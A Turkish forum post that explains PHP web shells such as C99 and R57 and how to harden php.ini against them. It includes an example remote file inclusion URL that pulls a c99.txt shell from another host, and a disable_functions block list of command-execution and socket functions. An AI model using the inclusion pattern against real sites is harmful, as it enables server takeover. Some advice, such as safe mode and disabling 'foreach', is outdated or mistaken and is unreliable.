06 Kasım 2023, 17:59 | #1 |
ZirveChat.Net Üyelik Tarihi: 23 Ekim 2023 Üye No: 3 Mesajlar: 88 Nerden: Bursa Meslek: Php,Html Aldığı Beğeni: 66 Beğendikleri: 35 | Shell Nedir? Shellden Korunma Yöntemleri Nelerdir? 1) SHELL NEDİR? PHP’ nin en büyük sorunlarından biridir. Dosyanın nereden geldiği ya da nasıl geldiği önemli değil önemli olan o dosyanın sunucuda olup olmamasıdır varsa PHP çalıştırma işlemlerini yapacaktır. Kodların işlenmesi ile geçmiş olsun sizde HACKLENDİNİZ! Onun için varsa sunucu şirketiniz ile irtibata geçip birazdan anlatacağım korunma yollarını talep ediniz eğer sunucu sizinse ve “root” yetkilisi sizseniz gerekli savunmayı kendiniz kolaylıkla yapabilirsiniz.- Başlıca SHELL tipleri, C99, R57, C100, ASPXspy2… devam eder.Bir kaç örnek vermek gerekirse cL..... adında bir hacker tarafından Kanal 3 hacklenmişti. Burada yaptığı şey yine basit bir shell ile saldırmak olmuştu. Aynı zaman da bir çok hack timine bağlı insanlar bunu yapmaktadır. Kısaca özetlemek gerekirsek SHELL sistem de sizi temel yetkilerle yetkilendirir.(Okuma, Yazma, Silme…) 2)SHELL NASIL KULLANILIR? Bunun bir çok farklı kullanımı bulunmaktadır.Özellikle programcılığın arttığı bu yıllar da bir çok farklı yöntem geliştirildi.Başlıca kullanımlar; http://www.siteadi.com/index.php?den...z.com/c99.txt? Bu örnekte index.php’ye c99.txt adlı metni siteden çek bu sayede sitenize c99.txt dosyası upload edildi. PHP değil çalışmaz ki düşüncesine sahip tanıdıklarım olduğu için belirtiyorum. YOK ÖYLE BİR DÜNYA ne yazık ki sistem bu dosyada ki kodları da işliyor. Bazen de upload açıkları oluyor örnek vermek gerekirse bir siteye girdiniz eğer dosyaları kontrol etmeden direk sunucuya taşıyorsa vay haline en fazla bir kaç saat ömrü var demektir. PHP dosyaları her ne olursa olsun sunucuda direkt olarak çalıştırılır. Sisteme girdikten sonra çıkan ekran; Bu gördüğünüz bir C99 örneğidir. Sisteme girdikten sonra yalnızca hacker’ın size yapıcağı şovları izlemek ile yetinirsiniz.- 3)Korunma Yolları İşte şimdi işin en güzel “Gardaş biz bu adamları durduramayız mı?” sorusunun cevabı elbette durdurulur.Zekice planlanmış bir savunma duvarı ile kendinizi en azından “lamer” tabirini kullandığımız 10-16 yaş grubu çocukları sitenizden uzak tutar. Gelelim korumaya; Sunucuya “ROOT” olarak giriş yapın.(Giriş yapmak için genel de putty kullanılır.) php.ini dosyasını düzenlemek için pico – vi – ya da nano editörlerinden birini kullanabilirsiniz. Ben pico’yu tercih ediyorum. Kod pico /etc/php.ini Kod Safe Mod ‘ Off ise Off u Silerek On Yapıyoruz ... Safe-mode: ON (secure) Kod Open base dir: /home/yer6tr:/usr/lib/php:/usr/local/lib/php:/tmp Kod Disable functions : foreach,glob,hopenbasedir,f_open,system,dl,passthru,cat,exec, popen,proc_close,proc_get_status,proc_nice,proc_open,escapeshellcmd,escapeshellarg, show_source,posix_mkfifo,mysql_list_dbs,get_current_user,getmyuid,pconnect,link,symlink, pcntl_exec,ini_alter,parse_ini_file,leak,apache_child_terminate,posix_kill, posix_setpgid,posix_setsid,posix_setuid,proc_terminate,syslog,fpassthru,stream_select, socket_select,socket_create,socket_create_listen,socket_create_pair,socket_listen,socket_accept,socket_bind, socket_strerror,pcntl_fork,pcntl_signal,pcntl_waitpid,pcntl_wexitstatus,pcntl_wifexited,pcntl_wifsignaled, pcntl_wifstopped,pcntl_wstopsig,pcntl_wtermsig,openlog,apache_get_modules,apache_get_version,apache_getenv, apache_note,apache_setenv,virtual,user_dir Suse ise- service apache2 restart yapıyoruz. Bu korumalardan sonra shell yalnızca CHMOD 777 yetkisine sahip olan klasörlere atılabilir halde olucaktır. vBulletin vb. Forum yazılımı kullanıyorsanız Mutlaka Configleri criptolayınız. |
|
Tag Ekle |
korunma, nedir?, nelerdir?, shell, shellden, yöntemleri |
Konuyu Toplam 1 Üye okuyor. (0 Kayıtlı üye ve 1 Misafir) | |
Seçenekler | |
Stil | |
| |